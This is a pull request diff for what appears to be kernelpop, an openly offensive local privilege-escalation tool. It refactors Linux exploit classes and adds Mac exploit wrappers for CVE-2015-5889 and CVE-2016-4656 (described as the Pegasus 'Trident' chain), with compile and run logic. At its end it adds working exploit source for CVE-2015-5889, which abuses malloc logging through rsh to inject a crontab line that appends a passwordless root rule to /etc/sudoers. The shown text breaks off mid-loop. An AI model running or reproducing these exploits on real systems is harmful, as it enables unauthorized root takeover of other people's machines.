### PR TITLE
Mac exploits

### DIFF
--- a/constants.py
+++ b/constants.py
@@ -1,8 +1,12 @@
 import os
+import subprocess
 ROOT_DIR = os.path.dirname(os.path.abspath(__file__))
 PLAYGROUND_PATH = os.path.join(ROOT_DIR, "playground")
 LINUX_EXPLOIT_PATH = os.path.join(ROOT_DIR, "exploits", "linux")
 LINUX_EXPLOIT_SOURCE_PATH = os.path.join(ROOT_DIR, "exploits", "linux", "source")
+MAC_EXPLOIT_PATH = os.path.join(ROOT_DIR, "exploits", "mac")
+MAC_EXPLOIT_SOURCE_PATH = os.path.join(ROOT_DIR, "exploits", "mac", "source")
+
 HIGH_RELIABILITY = "high"
 MEDIUM_RELIABILITY = "medium"
 LOW_RELIABILITY = "low"
@@ -59,6 +63,10 @@ ARCHITECTURE_x86_64 =   "x86_64"
 ARCHITECTURE_amd64 =    "amd64"
 ARCHITECTURE_i686 =     "i686"
 
+GENERIC_MAC = "mac"
+
+DARWIN_16 = "macdarwin16"
+
 HEADER = """
 ##########################
 #  welcome to kernelpop  #
@@ -96,3 +104,14 @@ def color_print(print_string, color=None, bold=False, underline=False, header=Fa
         print(color_string)
     else:
         print(print_string)
+
+
+def shell_results(self, shell_command):
+	p = subprocess.Popen(
+		shell_command,
+		stdin=subprocess.PIPE,
+		stdout=subprocess.PIPE,
+		stderr=subprocess.PIPE,
+		shell=True
+	)
+	return p.communicate()

--- a/constants.py
+++ b/constants.py
@@ -75,35 +75,35 @@ HEADER = """
 ##########################
 """
 class bcolors:
-    HEADER = '\033[95m'
-    OKBLUE = '\033[94m'
-    OKGREEN = '\033[92m'
-    WARNING = '\033[93m'
-    FAIL = '\033[91m'
-    ENDC = '\033[0m'
-    BOLD = '\033[1m'
-    UNDERLINE = '\033[4m'
+	HEADER = '\033[95m'
+	OKBLUE = '\033[94m'
+	OKGREEN = '\033[92m'
+	WARNING = '\033[93m'
+	FAIL = '\033[91m'
+	ENDC = '\033[0m'
+	BOLD = '\033[1m'
+	UNDERLINE = '\033[4m'
 
 
 def color_print(print_string, color=None, bold=False, underline=False, header=False):
-    if color:
-        color_string = ""
-        colors = {
-            "red": bcolors.FAIL,
-            "yellow": bcolors.WARNING,
-            "green": bcolors.OKGREEN,
-            "blue": bcolors.OKBLUE,
-        }
-        if bold:
-            color_string += bcolors.BOLD
-        if underline:
-            color_string += bcolors.UNDERLINE,
-        if header:
-            color_string += bcolors.HEADER
-        color_string += colors[color] + print_string + bcolors.ENDC
-        print(color_string)
-    else:
-        print(print_string)
+	if color:
+		color_string = ""
+		colors = {
+			"red": bcolors.FAIL,
+			"yellow": bcolors.WARNING,
+			"green": bcolors.OKGREEN,
+			"blue": bcolors.OKBLUE,
+		}
+		if bold:
+			color_string += bcolors.BOLD
+		if underline:
+			color_string += bcolors.UNDERLINE,
+		if header:
+			color_string += bcolors.HEADER
+		color_string += colors[color] + print_string + bcolors.ENDC
+		print(color_string)
+	else:
+		print(print_string)
 
 
 def shell_results(shell_command):

--- a/constants.py
+++ b/constants.py
@@ -1,6 +1,5 @@
 import os
 import subprocess
-
 ROOT_DIR = os.path.dirname(os.path.abspath(__file__))
 PLAYGROUND_PATH = os.path.join(ROOT_DIR, "playground")
 LINUX_EXPLOIT_PATH = os.path.join(ROOT_DIR, "exploits", "linux")
@@ -59,10 +58,10 @@ SOLARIS = "linuxsolaris"
 OPENBSD = "linuxopenbsd"
 NETBSD = "linuxnetbsd"
 
-ARCHITECTURE_GENERIC = "generic"
-ARCHITECTURE_x86_64 = "x86_64"
-ARCHITECTURE_amd64 = "amd64"
-ARCHITECTURE_i686 = "i686"
+ARCHITECTURE_GENERIC =  "generic"
+ARCHITECTURE_x86_64 =   "x86_64"
+ARCHITECTURE_amd64 =    "amd64"
+ARCHITECTURE_i686 =     "i686"
 
 GENERIC_MAC = "mac"
 
@@ -75,38 +74,37 @@ HEADER = """
 # let's pop some kernels #
 ##########################
 """
-
-
 class bcolors:
-	HEADER = '\033[95m'
-	OKBLUE = '\033[94m'
-	OKGREEN = '\033[92m'
-	WARNING = '\033[93m'
-	FAIL = '\033[91m'
-	ENDC = '\033[0m'
-	BOLD = '\033[1m'
-	UNDERLINE = '\033[4m'
+    HEADER = '\033[95m'
+    OKBLUE = '\033[94m'
+    OKGREEN = '\033[92m'
+    WARNING = '\033[93m'
+    FAIL = '\033[91m'
+    ENDC = '\033[0m'
+    BOLD = '\033[1m'
+    UNDERLINE = '\033[4m'
 
 
 def color_print(print_string, color=None, bold=False, underline=False, header=False):
-	if color:
-		color_string = ""
-		colors = {
-			"red": bcolors.FAIL,
-			"yellow": bcolors.WARNING,
-			"green": bcolors.OKGREEN,
-			"blue": bcolors.OKBLUE,
-		}
-		if bold:
-			color_string += bcolors.BOLD
-		if underline:
-			color_string += bcolors.UNDERLINE,
-		if header:
-			color_string += bcolors.HEADER
-		color_string += colors[color] + print_string + bcolors.ENDC
-		print(color_string)
-	else:
-		print(print_string)
+    if color:
+        color_string = ""
+        colors = {
+            "red": bcolors.FAIL,
+            "yellow": bcolors.WARNING,
+            "green": bcolors.OKGREEN,
+            "blue": bcolors.OKBLUE,
+        }
+        if bold:
+            color_string += bcolors.BOLD
+        if underline:
+            color_string += bcolors.UNDERLINE,
+        if header:
+            color_string += bcolors.HEADER
+        color_string += colors[color] + print_string + bcolors.ENDC
+        print(color_string)
+    else:
+        print(print_string)
+
 
 def shell_results(shell_command):
 	p = subprocess.Popen(

--- a/constants.py
+++ b/constants.py
@@ -106,7 +106,7 @@ def color_print(print_string, color=None, bold=False, underline=False, header=Fa
         print(print_string)
 
 
-def shell_results(self, shell_command):
+def shell_results(shell_command):
 	p = subprocess.Popen(
 		shell_command,
 		stdin=subprocess.PIPE,

--- a/exploits/exploit.py
+++ b/exploits/exploit.py
@@ -3,9 +3,10 @@ Base exploit class
 """
 import os
 import subprocess
-from constants import LOW_RELIABILITY, PLAYGROUND_PATH, color_print, ARCHITECTURE_GENERIC, LINUX_EXPLOIT_SOURCE_PATH
+from constants import LOW_RELIABILITY, PLAYGROUND_PATH, color_print, ARCHITECTURE_GENERIC, LINUX_EXPLOIT_SOURCE_PATH, \
+	MAC_EXPLOIT_PATH
 
-class Exploit:
+class LinuxExploit:
 	def __init__(self):
 		self.name = "CVE-WHOOPS-BASE-CLASS"
 		self.type = "not a real os"
@@ -14,6 +15,66 @@ class Exploit:
 		self.vulnerable_kernels = []
 		self.architecture = ARCHITECTURE_GENERIC
 		self.source_c_path = os.path.join(LINUX_EXPLOIT_SOURCE_PATH, "{}.c".format(self.name))
+		self.compilation_path = os.path.join(PLAYGROUND_PATH, self.name)
+		self.compilation_command = ["gcc", "-o", self.compilation_path, self.source_c_path]
+		self.exploit_command = self.compilation_path
+
+	def determine_vulnerability(self):
+		color_print("\t[*] checking exploitation prerequisites for {}".format(self.name), color="blue")
+		# if kernel matches...it should be vulnerable
+		color_print("\t[-] system appears not to be vulnerable to {}".format(self.name), color="red")
+		return False
+
+	def shell_results(self, shell_command):
+		p = subprocess.Popen(
+			shell_command,
+			stdin=subprocess.PIPE,
+			stdout=subprocess.PIPE,
+			stderr=subprocess.PIPE,
+			shell=True
+		)
+		return p.communicate()
+
+	def exploit_failure(self, failure_reason):
+		color_print("\t[-] exploitation failed: {}".format(failure_reason), color="red")
+
+	def compilation_successful(self):
+		if os.path.isfile(self.compilation_path):
+			return True
+		else:
+			return False
+
+	def exploit_compile(self):
+		color_print("\t[*] compiling exploit {} to {}".format(self.name, self.compilation_path), color="blue")
+		color_print("\t[*] {}".format(self.compilation_command), color="blue")
+		compilation_results = self.shell_results(self.compilation_command)
+		if self.compilation_successful():
+			color_print("\t[+] compilation successful!", color="green")
+		else:
+			self.exploit_failure("failed to compile exploit {}".format(self.name))
+
+	def exploit(self):
+		perform_exploitation = str(input("Would you like to run exploit {} on this system? (y/n): ".format(self.name)))
+		if "y" in perform_exploitation.lower():
+			self.exploit_compile()
+			if self.compilation_successful():
+				color_print("\t[*] performing exploitation of {}".format(self.name))
+				try:
+					subprocess.call(self.exploit_command)
+				except:
+					self.exploit_failure("exploitation interrupted")
+		else:
+			self.exploit_failure("canceled execution of exploit {}".format(self.name))
+
+class MacExploit:
+	def __init__(self):
+		self.name = "CVE-WHOOPS-BASE-CLASS"
+		self.type = "not a real os"
+		self.brief_desc = "A base class for exploits"
+		self.reliability = LOW_RELIABILITY
+		self.vulnerable_kernels = []
+		self.architecture = ARCHITECTURE_GENERIC
+		self.source_c_path = os.path.join(MAC_EXPLOIT_PATH, "{}.c".format(self.name))
 		self.compilation_path = os.path.join(PLAYGROUND_PATH, self.name)
 		self.compilation_command = ["gcc", "-o", self.compilation_path, self.source_c_path]
 		self.exploit_command = self.compilation_path

--- a/exploits/linux/CVE20091185.py
+++ b/exploits/linux/CVE20091185.py
@@ -5,12 +5,12 @@ https://www.exploit-db.com/exploits/8572/
 import os
 import uuid
 import subprocess
-from exploits.exploit import Exploit
+from exploits.exploit import LinuxExploit
 from src.kernels import KernelWindow
 from constants import LINUX_EXPLOIT_SOURCE_PATH, PLAYGROUND_PATH, MEDIUM_RELIABILITY, color_print, DEBIAN_7, DEBIAN_8,\
 	CONFIRMED_VULNERABLE, UBUNTU_6_LTS, UBUNTU_7, UBUNTU_8, UBUNTU_8_LTS, GENERIC_LINUX
 
-class CVE20091185(Exploit):
+class CVE20091185(LinuxExploit):
 	def __init__(self):
 		super().__init__()
 		self.name = "CVE-2009-1185"

--- a/exploits/linux/CVE20140196.py
+++ b/exploits/linux/CVE20140196.py
@@ -2,11 +2,11 @@
 https://github.com/SecWiki/linux-kernel-exploits/tree/master/2014/CVE-2014-4014
 """
 import os
-from exploits.exploit import Exploit
+from exploits.exploit import LinuxExploit
 from src.kernels import KernelWindow
 from constants import LOW_RELIABILITY, color_print, GENERIC_LINUX, LINUX_EXPLOIT_SOURCE_PATH, CONFIRMED_VULNERABLE, \
 	PLAYGROUND_PATH
-class CVE20140196(Exploit):
+class CVE20140196(LinuxExploit):
 	def __init__(self):
 		super().__init__()
 		self.name = "CVE20140196"

--- a/exploits/linux/CVE20143153.py
+++ b/exploits/linux/CVE20143153.py
@@ -2,11 +2,11 @@
 https://github.com/SecWiki/linux-kernel-exploits/tree/master/2014/CVE-2014-3153
 """
 import os
-from exploits.exploit import Exploit
+from exploits.exploit import LinuxExploit
 from src.kernels import KernelWindow
 from constants import HIGH_RELIABILITY, color_print, RHEL, CENTOS, CONFIRMED_VULNERABLE, UBUNTU_GENERIC, \
 	DEBIAN_7, DEBIAN_GENERIC, GENERIC_LINUX, LINUX_EXPLOIT_SOURCE_PATH, PLAYGROUND_PATH
-class CVE20143153(Exploit):
+class CVE20143153(LinuxExploit):
 	def __init__(self):
 		super().__init__()
 		self.name = "CVE20143153"

--- a/exploits/linux/CVE20144014.py
+++ b/exploits/linux/CVE20144014.py
@@ -2,11 +2,11 @@
 https://github.com/SecWiki/linux-kernel-exploits/tree/master/2014/CVE-2014-4014
 """
 import os
-from exploits.exploit import Exploit
+from exploits.exploit import LinuxExploit
 from src.kernels import KernelWindow
 from constants import HIGH_RELIABILITY, color_print, LINUX_EXPLOIT_SOURCE_PATH, PLAYGROUND_PATH, CONFIRMED_VULNERABLE,\
 	GENERIC_LINUX
-class CVE20144014(Exploit):
+class CVE20144014(LinuxExploit):
 	def __init__(self):
 		super().__init__()
 		self.name = "CVE20144014"

--- a/exploits/linux/CVE20144699.py
+++ b/exploits/linux/CVE20144699.py
@@ -2,12 +2,12 @@
 exploit source: https://github.com/SecWiki/linux-kernel-exploits/blob/master/2014/CVE-2014-4699
 """
 import os
-from exploits.exploit import Exploit
+from exploits.exploit import LinuxExploit
 from src.kernels import KernelWindow
 from constants import MEDIUM_RELIABILITY, color_print, CONFIRMED_VULNERABLE, GENERIC_LINUX, LINUX_EXPLOIT_SOURCE_PATH,\
 	PLAYGROUND_PATH
 
-class CVE20144699(Exploit):
+class CVE20144699(LinuxExploit):
 	def __init__(self):
 		super().__init__()
 		self.name = "CVE20144699"

--- a/exploits/linux/CVE20151328.py
+++ b/exploits/linux/CVE20151328.py
@@ -2,12 +2,12 @@
 CVE 2015 1328
 """
 import os
-from exploits.exploit import Exploit
+from exploits.exploit import LinuxExploit
 from constants import HIGH_RELIABILITY, CONFIRMED_VULNERABLE, GENERIC_LINUX, color_print, LINUX_EXPLOIT_SOURCE_PATH, \
 	PLAYGROUND_PATH
 from src.kernels import KernelWindow
 
-class CVE20151328(Exploit):
+class CVE20151328(LinuxExploit):
 	def __init__(self):
 		super().__init__()
 		self.name = "CVE20151328"

--- a/exploits/linux/CVE20160728.py
+++ b/exploits/linux/CVE20160728.py
@@ -2,12 +2,12 @@
 CVE-2016-0728
 """
 import os
-from exploits.exploit import Exploit
+from exploits.exploit import LinuxExploit
 from constants import color_print, MEDIUM_RELIABILITY, UBUNTU_GENERIC, CONFIRMED_VULNERABLE, DEBIAN_8, \
 	PLAYGROUND_PATH, LINUX_EXPLOIT_SOURCE_PATH, ARCHITECTURE_x86_64
 from src.kernels import KernelWindow
 
-class CVE20160728(Exploit):
+class CVE20160728(LinuxExploit):
 	def __init__(self):
 		super().__init__()
 		self.name = "CVE20160728"

--- a/exploits/linux/CVE20162384.py
+++ b/exploits/linux/CVE20162384.py
@@ -2,12 +2,12 @@
 Base exploit class
 """
 import os
-from exploits.exploit import Exploit
+from exploits.exploit import LinuxExploit
 from constants import LOW_RELIABILITY, CONFIRMED_VULNERABLE, UBUNTU_GENERIC, DEBIAN_GENERIC, color_print, \
 	LINUX_EXPLOIT_SOURCE_PATH, PLAYGROUND_PATH
 from src.kernels import KernelWindow
 
-class CVE20162384(Exploit):
+class CVE20162384(LinuxExploit):
 	def __init__(self):
 		super().__init__()
 		self.name = "CVE20162384"

--- a/exploits/linux/CVE20165195_32.py
+++ b/exploits/linux/CVE20165195_32.py
@@ -2,12 +2,12 @@
 Dirty Cow
 """
 import os
-from exploits.exploit import Exploit
+from exploits.exploit import LinuxExploit
 from src.kernels import KernelWindow
 from constants import color_print, GENERIC_LINUX, CONFIRMED_VULNERABLE, HIGH_RELIABILITY, LINUX_EXPLOIT_SOURCE_PATH, \
 	PLAYGROUND_PATH, ARCHITECTURE_i686
 
-class CVE20165195_32(Exploit):
+class CVE20165195_32(LinuxExploit):
 	def __init__(self):
 		super().__init__()
 		self.name = "CVE20165195_32"

--- a/exploits/linux/CVE20165195_32_poke.py
+++ b/exploits/linux/CVE20165195_32_poke.py
@@ -2,12 +2,12 @@
 Dirty Cow
 """
 import os
-from exploits.exploit import Exploit
+from exploits.exploit import LinuxExploit
 from src.kernels import KernelWindow
 from constants import color_print, GENERIC_LINUX, CONFIRMED_VULNERABLE, HIGH_RELIABILITY, LINUX_EXPLOIT_SOURCE_PATH, \
 	PLAYGROUND_PATH, ARCHITECTURE_i686
 
-class CVE20165195_32_poke(Exploit):
+class CVE20165195_32_poke(LinuxExploit):
 	def __init__(self):
 		super().__init__()
 		self.name = "CVE20165195_32_poke"

--- a/exploits/linux/CVE20165195_64.py
+++ b/exploits/linux/CVE20165195_64.py
@@ -2,12 +2,12 @@
 Dirty Cow
 """
 import os
-from exploits.exploit import Exploit
+from exploits.exploit import LinuxExploit
 from src.kernels import KernelWindow
 from constants import color_print, GENERIC_LINUX, CONFIRMED_VULNERABLE, HIGH_RELIABILITY, LINUX_EXPLOIT_SOURCE_PATH, \
 	PLAYGROUND_PATH, ARCHITECTURE_x86_64
 
-class CVE20165195_64(Exploit):
+class CVE20165195_64(LinuxExploit):
 	def __init__(self):
 		super().__init__()
 		self.name = "CVE20165195_64"

--- a/exploits/linux/CVE20165195_64_poke.py
+++ b/exploits/linux/CVE20165195_64_poke.py
@@ -2,12 +2,12 @@
 Dirty Cow
 """
 import os
-from exploits.exploit import Exploit
+from exploits.exploit import LinuxExploit
 from src.kernels import KernelWindow
 from constants import color_print, GENERIC_LINUX, CONFIRMED_VULNERABLE, HIGH_RELIABILITY, LINUX_EXPLOIT_SOURCE_PATH, \
 	PLAYGROUND_PATH, ARCHITECTURE_x86_64
 
-class CVE20165195_64_poke(Exploit):
+class CVE20165195_64_poke(LinuxExploit):
 	def __init__(self):
 		super().__init__()
 		self.name = "CVE20165195_64_poke"

--- a/exploits/linux/CVE20171000112.py
+++ b/exploits/linux/CVE20171000112.py
@@ -3,12 +3,12 @@ adapted from:
 https://github.com/SecWiki/linux-kernel-exploits/blob/master/2017/CVE-2017-1000112/poc.c
 """
 import os
-from exploits.exploit import Exploit
+from exploits.exploit import LinuxExploit
 from src.kernels import KernelWindow
 from constants import PLAYGROUND_PATH, LINUX_EXPLOIT_SOURCE_PATH, HIGH_RELIABILITY, color_print, UBUNTU_14, \
 	UBUNTU_14_LTS, UBUNTU_16, UBUNTU_16_LTS, CONFIRMED_VULNERABLE
 
-class CVE20171000112(Exploit):
+class CVE20171000112(LinuxExploit):
 	def __init__(self):
 		super().__init__()
 		self.name = "CVE20171000112"

--- a/exploits/linux/CVE20171000367.py
+++ b/exploits/linux/CVE20171000367.py
@@ -3,11 +3,11 @@ adapted from:
 https://github.com/c0d3z3r0/sudo-CVE-2017-1000367/sudopwn.c
 """
 import os
-from exploits.exploit import Exploit
+from exploits.exploit import LinuxExploit
 from src.kernels import KernelWindow
 from constants import PLAYGROUND_PATH, LINUX_EXPLOIT_SOURCE_PATH, HIGH_RELIABILITY, color_print, GENERIC_LINUX, \
 	POTENTIALLY_VULNERABLE, ARCHITECTURE_i686
-class CVE20171000367(Exploit):
+class CVE20171000367(LinuxExploit):
 	def __init__(self):
 		super().__init__()
 		self.name = "CVE20171000367"

--- a/exploits/linux/CVE20171000370.py
+++ b/exploits/linux/CVE20171000370.py
@@ -2,12 +2,12 @@
 https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
 """
 import os
-from exploits.exploit import Exploit
+from exploits.exploit import LinuxExploit
 from src.kernels import KernelWindow
 from constants import color_print, UBUNTU_17, UBUNTU_16, UBUNTU_14, DEBIAN_9, DEBIAN_8, DEBIAN_7, FEDORA, \
 	CENTOS, CONFIRMED_VULNERABLE, HIGH_RELIABILITY, ARCHITECTURE_i686, PLAYGROUND_PATH, LINUX_EXPLOIT_SOURCE_PATH
 
-class CVE20171000370(Exploit):
+class CVE20171000370(LinuxExploit):
 	def __init__(self):
 		super().__init__()
 		self.name = "CVE20171000370"

--- a/exploits/linux/CVE20171000371.py
+++ b/exploits/linux/CVE20171000371.py
@@ -1,10 +1,10 @@
 import os
-from exploits.exploit import Exploit
+from exploits.exploit import LinuxExploit
 from src.kernels import KernelWindow
 from constants import color_print, HIGH_RELIABILITY, CONFIRMED_VULNERABLE, UBUNTU_14, UBUNTU_16, UBUNTU_17, FEDORA, \
 	DEBIAN_9, DEBIAN_10, ARCHITECTURE_i686, LINUX_EXPLOIT_SOURCE_PATH, PLAYGROUND_PATH
 
-class CVE20171000371(Exploit):
+class CVE20171000371(LinuxExploit):
 	def __init__(self):
 		super().__init__()
 		self.name = "CVE20171000371"

--- a/exploits/linux/CVE20171000372.py
+++ b/exploits/linux/CVE20171000372.py
@@ -2,12 +2,12 @@
 https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
 """
 import os
-from exploits.exploit import Exploit
+from exploits.exploit import LinuxExploit
 from src.kernels import KernelWindow
 from constants import color_print, OPENBSD, CONFIRMED_VULNERABLE, HIGH_RELIABILITY, ARCHITECTURE_i686, \
 	PLAYGROUND_PATH, LINUX_EXPLOIT_SOURCE_PATH
 
-class CVE20171000372(Exploit):
+class CVE20171000372(LinuxExploit):
 	def __init__(self):
 		super().__init__()
 		self.name = "CVE20171000372"

--- a/exploits/linux/CVE20171000373.py
+++ b/exploits/linux/CVE20171000373.py
@@ -2,12 +2,12 @@
 https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
 """
 import os
-from exploits.exploit import Exploit
+from exploits.exploit import LinuxExploit
 from src.kernels import KernelWindow
 from constants import color_print, OPENBSD, CONFIRMED_VULNERABLE, HIGH_RELIABILITY, ARCHITECTURE_i686, \
 	PLAYGROUND_PATH, LINUX_EXPLOIT_SOURCE_PATH
 
-class CVE20171000373(Exploit):
+class CVE20171000373(LinuxExploit):
 	def __init__(self):
 		super().__init__()
 		self.name = "CVE20171000373"

--- a/exploits/linux/CVE20171000379.py
+++ b/exploits/linux/CVE20171000379.py
@@ -2,12 +2,12 @@
 https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
 """
 import os
-from exploits.exploit import Exploit
+from exploits.exploit import LinuxExploit
 from src.kernels import KernelWindow
 from constants import color_print, UBUNTU_17, UBUNTU_16, UBUNTU_14, DEBIAN_9, DEBIAN_8, DEBIAN_7, FEDORA, CENTOS, \
 	CONFIRMED_VULNERABLE, HIGH_RELIABILITY, ARCHITECTURE_amd64, PLAYGROUND_PATH, LINUX_EXPLOIT_SOURCE_PATH
 
-class CVE20171000379(Exploit):
+class CVE20171000379(LinuxExploit):
 	def __init__(self):
 		super().__init__()
 		self.name = "CVE20171000379"

--- a/exploits/linux/CVE20173630.py
+++ b/exploits/linux/CVE20173630.py
@@ -1,10 +1,10 @@
 import os
-from exploits.exploit import Exploit
+from exploits.exploit import LinuxExploit
 from src.kernels import KernelWindow
 from constants import color_print, SOLARIS, POTENTIALLY_VULNERABLE, HIGH_RELIABILITY, LINUX_EXPLOIT_SOURCE_PATH, \
 	PLAYGROUND_PATH
 
-class CVE20173630(Exploit):
+class CVE20173630(LinuxExploit):
 	def __init__(self):
 		super().__init__()
 		self.name = "CVE20173630"

--- a/exploits/linux/CVE20175123.py
+++ b/exploits/linux/CVE20175123.py
@@ -2,12 +2,12 @@
 CVE-2017-5123
 """
 import os
-from exploits.exploit import Exploit
+from exploits.exploit import LinuxExploit
 from src.kernels import KernelWindow
 from constants import LOW_RELIABILITY, PLAYGROUND_PATH, color_print, DEBIAN_UNSTABLE, CONFIRMED_VULNERABLE, \
 	UBUNTU_GENERIC, GENERIC_LINUX, LINUX_EXPLOIT_SOURCE_PATH
 
-class CVE20175123(Exploit):
+class CVE20175123(LinuxExploit):
 	def __init__(self):
 		super().__init__()
 		self.name = "CVE20175123"

--- a/exploits/linux/CVE20176074.py
+++ b/exploits/linux/CVE20176074.py
@@ -2,12 +2,12 @@
 Base exploit class
 """
 import os
-from exploits.exploit import Exploit
+from exploits.exploit import LinuxExploit
 from src.kernels import KernelWindow
 from constants import LOW_RELIABILITY, PLAYGROUND_PATH, color_print, GENERIC_LINUX, CONFIRMED_VULNERABLE, \
 	LINUX_EXPLOIT_SOURCE_PATH
 
-class CVE20176074(Exploit):
+class CVE20176074(LinuxExploit):
 	def __init__(self):
 		super().__init__()
 		self.name = "CVE20176074"

--- a/exploits/linux/CVE20177308.py
+++ b/exploits/linux/CVE20177308.py
@@ -1,10 +1,10 @@
 import os
-from exploits.exploit import Exploit
+from exploits.exploit import LinuxExploit
 from src.kernels import KernelWindow
 from constants import PLAYGROUND_PATH, LINUX_EXPLOIT_SOURCE_PATH, HIGH_RELIABILITY, color_print, GENERIC_LINUX, \
 	CONFIRMED_VULNERABLE
 
-class CVE20177308(Exploit):
+class CVE20177308(LinuxExploit):
 	def __init__(self):
 		super().__init__()
 		self.name = "CVE20177308"

--- a/exploits/mac/CVE20155889.py
+++ b/exploits/mac/CVE20155889.py
@@ -3,7 +3,7 @@ import subprocess
 from exploits.exploit import MacExploit
 from src.kernels import KernelWindow
 from constants import ARCHITECTURE_GENERIC, MAC_EXPLOIT_PATH, PLAYGROUND_PATH, color_print, \
-	MEDIUM_RELIABILITY, CONFIRMED_VULNERABLE, DARWIN_16
+	MEDIUM_RELIABILITY, CONFIRMED_VULNERABLE, GENERIC_MAC
 
 class CVE20155889(MacExploit):
 	def __init__(self):
@@ -14,7 +14,7 @@ class CVE20155889(MacExploit):
 		self.brief_desc = "issetugid() + rsh + libmalloc osx local root"
 		self.reliability = MEDIUM_RELIABILITY
 		self.vulnerable_kernels = [
-			KernelWindow(DARWIN_16, CONFIRMED_VULNERABLE, 10, 9, 5, 10, 10, 5)
+			KernelWindow(GENERIC_MAC, CONFIRMED_VULNERABLE, 10, 9, 5, 10, 10, 5)
 		]
 		self.architecture = ARCHITECTURE_GENERIC
 		self.source_c_path = os.path.join(MAC_EXPLOIT_PATH, "{}.c".format(self.name))

--- a/exploits/mac/CVE20155889.py
+++ b/exploits/mac/CVE20155889.py
@@ -1,0 +1,44 @@
+import os
+import subprocess
+from exploits.exploit import MacExploit
+from src.kernels import KernelWindow
+from constants import ARCHITECTURE_GENERIC, MAC_EXPLOIT_PATH, PLAYGROUND_PATH, color_print, \
+	MEDIUM_RELIABILITY, CONFIRMED_VULNERABLE, DARWIN_16
+
+class CVE20155889(MacExploit):
+	def __init__(self):
+		super().__init__()
+		self.name = "CVE20155889"
+		self.formatted_name = "CVE-2015-5889"
+		self.type = "mac"
+		self.brief_desc = "issetugid() + rsh + libmalloc osx local root"
+		self.reliability = MEDIUM_RELIABILITY
+		self.vulnerable_kernels = [
+			KernelWindow(DARWIN_16, CONFIRMED_VULNERABLE, 10, 9, 5, 10, 10, 5)
+		]
+		self.architecture = ARCHITECTURE_GENERIC
+		self.source_c_path = os.path.join(MAC_EXPLOIT_PATH, "{}.c".format(self.name))
+		self.compilation_path = os.path.join(PLAYGROUND_PATH, self.name)
+		self.exploit_command = "python {}.py".format(self.compilation_path)
+
+	def determine_vulnerability(self):
+		color_print("\t[*] checking exploitation prerequisites for {}".format(self.name), color="blue")
+		# if kernel matches...it should be vulnerable
+		color_print("\t[-] system appears not to be vulnerable to {}".format(self.name), color="red")
+		return True
+
+	def exploit(self):
+		"""
+		We need to override base exploit because we're running a python script, not compiling C source
+		"""
+		perform_exploitation = str(
+			input("Would you like to run exploit {} on this system? (y/n): ".format(self.name)))
+		if "y" in perform_exploitation.lower():
+			color_print("\t[*] performing exploitation of {}".format(self.name))
+			color_print("\t[*] {}".format(self.exploit_command))
+			try:
+				subprocess.call(self.exploit_command)
+			except:
+				self.exploit_failure("exploitation interrupted")
+		else:
+			self.exploit_failure("canceled execution of exploit {}".format(self.name))

--- a/exploits/mac/CVE20164656.py
+++ b/exploits/mac/CVE20164656.py
@@ -1,0 +1,32 @@
+import os
+from exploits.exploit import MacExploit
+from src.kernels import KernelWindow
+from constants import ARCHITECTURE_GENERIC, MAC_EXPLOIT_SOURCE_PATH, PLAYGROUND_PATH, color_print, \
+	MEDIUM_RELIABILITY, CONFIRMED_VULNERABLE, DARWIN_16
+
+class CVE20164656(MacExploit):
+	def __init__(self):
+		super().__init__()
+		self.name = "CVE20164656"
+		self.formatted_name = "CVE-2016-4656"
+		self.type = "mac"
+		self.brief_desc = "`Trident` exploit chain from `PEGASUS` APT"
+		self.reliability = MEDIUM_RELIABILITY
+		self.vulnerable_kernels = [
+			KernelWindow(DARWIN_16, CONFIRMED_VULNERABLE, 0, 0, 0, 10, 11, 16)
+		]
+		self.architecture = ARCHITECTURE_GENERIC
+		self.source_c_path = os.path.join(MAC_EXPLOIT_SOURCE_PATH, self.name)
+		self.compilation_path = os.path.join(PLAYGROUND_PATH, self.name)
+		self.compilation_command = "clang -framework IOKit -framework Foundation -framework CoreFoundation " \
+								"-m32 -Wl,-pagezero_size,0 -O3 {}/exp.m {}/lsym.m -o {}".format(
+			self.source_c_path,
+			self.source_c_path,
+			self.compilation_path)
+		self.exploit_command = self.compilation_path
+
+	def determine_vulnerability(self):
+		color_print("\t[*] checking exploitation prerequisites for {}".format(self.name), color="blue")
+		# if kernel matches...it should be vulnerable
+		color_print("\t[-] system appears not to be vulnerable to {}".format(self.name), color="red")
+		return True

--- a/exploits/mac/CVE20164656.py
+++ b/exploits/mac/CVE20164656.py
@@ -2,7 +2,7 @@ import os
 from exploits.exploit import MacExploit
 from src.kernels import KernelWindow
 from constants import ARCHITECTURE_GENERIC, MAC_EXPLOIT_SOURCE_PATH, PLAYGROUND_PATH, color_print, \
-	MEDIUM_RELIABILITY, CONFIRMED_VULNERABLE, DARWIN_16
+	MEDIUM_RELIABILITY, CONFIRMED_VULNERABLE, GENERIC_MAC
 
 class CVE20164656(MacExploit):
 	def __init__(self):
@@ -13,7 +13,7 @@ class CVE20164656(MacExploit):
 		self.brief_desc = "`Trident` exploit chain from `PEGASUS` APT"
 		self.reliability = MEDIUM_RELIABILITY
 		self.vulnerable_kernels = [
-			KernelWindow(DARWIN_16, CONFIRMED_VULNERABLE, 0, 0, 0, 10, 11, 16)
+			KernelWindow(GENERIC_MAC, CONFIRMED_VULNERABLE, 0, 0, 0, 10, 11, 16)
 		]
 		self.architecture = ARCHITECTURE_GENERIC
 		self.source_c_path = os.path.join(MAC_EXPLOIT_SOURCE_PATH, self.name)

--- a/exploits/mac/source/CVE20155889.py
+++ b/exploits/mac/source/CVE20155889.py
@@ -1,0 +1,38 @@
+# CVE-2015-5889: issetugid() + rsh + libmalloc osx local root
+# tested on osx 10.9.5 / 10.10.5
+# jul/2015
+# by rebel
+
+import os, time, sys
+
+env = {}
+
+s = os.stat("/etc/sudoers").st_size
+
+env['MallocLogFile'] = '/etc/crontab'
+env['MallocStackLogging'] = 'yes'
+env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n'
+
+sys.stderr.write("creating /etc/crontab..")
+
+p = os.fork()
+if p == 0:
+	os.close(1)
+	os.close(2)
+	os.execve("/usr/bin/rsh", ["rsh", "localhost"], env)
+
+time.sleep(1)
+
+if "NOPASSWD" not in open("/etc/crontab").read():
+	sys.stderr.write("failed\n")
+	sys.exit(-1)
+
+sys.stderr.write("done\nwaiting for /etc/sudoers to change (<60 seconds)..")
+
+while os.stat("/etc/sudoers").st_size == s:
